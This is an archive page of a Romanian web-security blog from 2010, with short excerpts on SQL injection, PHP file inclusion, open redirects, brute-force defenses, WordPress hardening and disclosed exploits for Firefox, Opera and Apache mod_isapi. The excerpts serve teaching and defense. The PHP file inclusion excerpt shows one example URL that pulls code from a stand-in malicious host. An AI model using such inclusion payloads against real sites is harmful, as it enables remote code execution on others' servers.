Archive for category Securitate Web
Методы предотвращения атак SQL Injection
Posted by Grigori in Măsuri de control, Securitate Web, Vulnerabilităţi on March 30, 2010
Для начала давайте попробуем разобраться, что же такое SQL Injection, какие они бывают, чем они опасны и зачем могут применяться. Read the rest of this entry »
Includerea fişierelor PHP, descriere şi măsuri de control
Posted by Mihai in Măsuri de control, Securitate Web, Vulnerabilităţi on March 29, 2010
Ce presupune “Includerea fişierelor PHP” (PHP File Inclusion)? E o greşeală care exploatează utilizarea neintenţionată a unei particularităţi periculoase specifice PHP. Un limbaj de programare complet, ca PHP, de obicei oferă facilitatea de a include fişiere suplimentare spre execuţie. Această caracteristică este utilizată frecvent pentru a include biblioteci, anteturi sau alte elemente de cod comune pentru mai multe pagini sau script-uri. PHP are implementată o particularitate suplimentară a acestei funcţionalităţi: Fişierul sau directoriul inclus nu e obligatoriu să fie unul local. Cu alte cuvinte, dacă un răufăcător reuşeşte să modifice numele fişierului indicat spre a fi inclus în unul de tip
http://exemple.com/?fisier=http://exemple-maliţioase.com/cod.php
atunci output-ul acestui URL va fi inclus şi executat în contextul scriptului local. Read the rest of this entry »
Open Redirect – descriere şi măsuri de protecţie
Posted by Mihai in Atacuri, Securitate Web on March 25, 2010
Redirecţionare deschisă (Open Redirect) – O aplicaţie web acceptă date de intrare controlate de utilizator care specifică un link către un site extern, şi foloseşte această legătură într-o redirecţionare. Acest lucru favorizează atacurile phishing.
Redirecţionarea este frecvent utilizată în toate aplicatiile web pentru diverse scopuri. În pagina de logare, e o practică comună de a redirecţiona utilizatorul la o altă pagină, o dată ce utilizatorul s-a autentificat. Uneori utilizatorul merge direct la o pagina de conţinut şi este redirecţionat către o pagină de logare, pentru a redirecţiona utilizatorul înapoi la pagina cu conţinut, un link de redirectionare este uneori utilizat. Read the rest of this entry »
Măsuri de protecţie împotriva atacurilor brute-force
Posted by Mihai in Măsuri de control, Securitate Web on March 24, 2010
Un atac de tip brute-force este un atac în care toate opţiunile posibile sunt verificate, fără a acorda o valoare specială opţiunilor mult mai probabile, formal mai este cunoscut sub numele de atac de enumerare (enumeration attack) – atacul prin care se enumeră toate posibilităţile.
În ceea ce priveşte controlul accesului, atacurile de tip brute-force implică de obicei un singur atacator care încearcă să se logheze cu un număr foarte mare de tentative. În majoritatea cazurilor, numele de utilizator utilizate sunt cunoscute, iar parola este ghicită.
Deşi nu este un punct de vedere tehnic, un atac brute-force este foarte asemănător cu un atac după dicţionar. Cea mai mare diferenţă este că un atac după dicţionar enumeră parolele după o listă de posibilităţi probabile, iar brute-force prin intermediul enumerârii unei liste a tuturor posibilităţilor. Read the rest of this entry »
Securizare WordPress
Posted by Mihai in Măsuri de control, Securitate Web on March 22, 2010
Astazi am fost martorul unei compromiteri a unui site bazat pe popularul sistem de blogging WordPress. Situl bologan.com a fost compromis. Continutul a 2 fisiere a fost modificat si incluse linii de cod javascript care incercau sa infecteze utilizatorii sitului cu programe malware. Aceasta a avut loc din cauza că versiunea aplicaţiei utilizate nu era actuală. Din cauza popularităţii foarte mari, fiecare breşă de securitate a WordPress e utilizată pe larg în infectarea utilizatorilor cu aplicaţii malware şi crearea botnet-urilor. Read the rest of this entry »
Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
Posted by Mihai in Exploits, Vulnerabilităţi on March 9, 2010
Opera 10.50 Asynchronous XMLHttpRequest Basic Auth Crash
Posted by Mihai in Exploits, Vulnerabilităţi on March 9, 2010
A fost divulgată o vulnerabilitate pentru Apache HTTP Server 2.2.14
Posted by Mihai in Exploits, Vulnerabilităţi on March 8, 2010
Apache HTTP Server, este unul dintre cele mai populare web-servere open source. mod_isapi este un modul de baza al Apache care implementeaza Internet Server extension API. Acest modul permite Apache să deservească extensii de tip Internet Server (module ISAPI .dll) în sistemele bazate pe Microsoft Windows.
Prin trimiterea unei cereri special pregatite, urmată de un alt pachet special e posibil de a declanşa o vulnerabilitate în mod_isapi Apache, care va descărca modulul ISAPI din memorie. Cu toate acestea pointerii în continuare rămân în memorie şi sunt solicitaţi de funcţiile ISAPI la care se face referire. Aceasta duce la o vulnerabilitate de tipul memory class violation.
Exploatarea cu succes a acestei vulnerabilităţi, rezultă în executarea codului arbitrar cu drepturi de SYSTEM.
Conceptul atacului
Codul sursă de exploatare a acestei vulnerabilităţi e disponibil mai jos. El va crea un fişier sos.txt, în directoriul de lucru al Apache pentru a demonstra că executarea codului arbitrar e posibilă. Read the rest of this entry »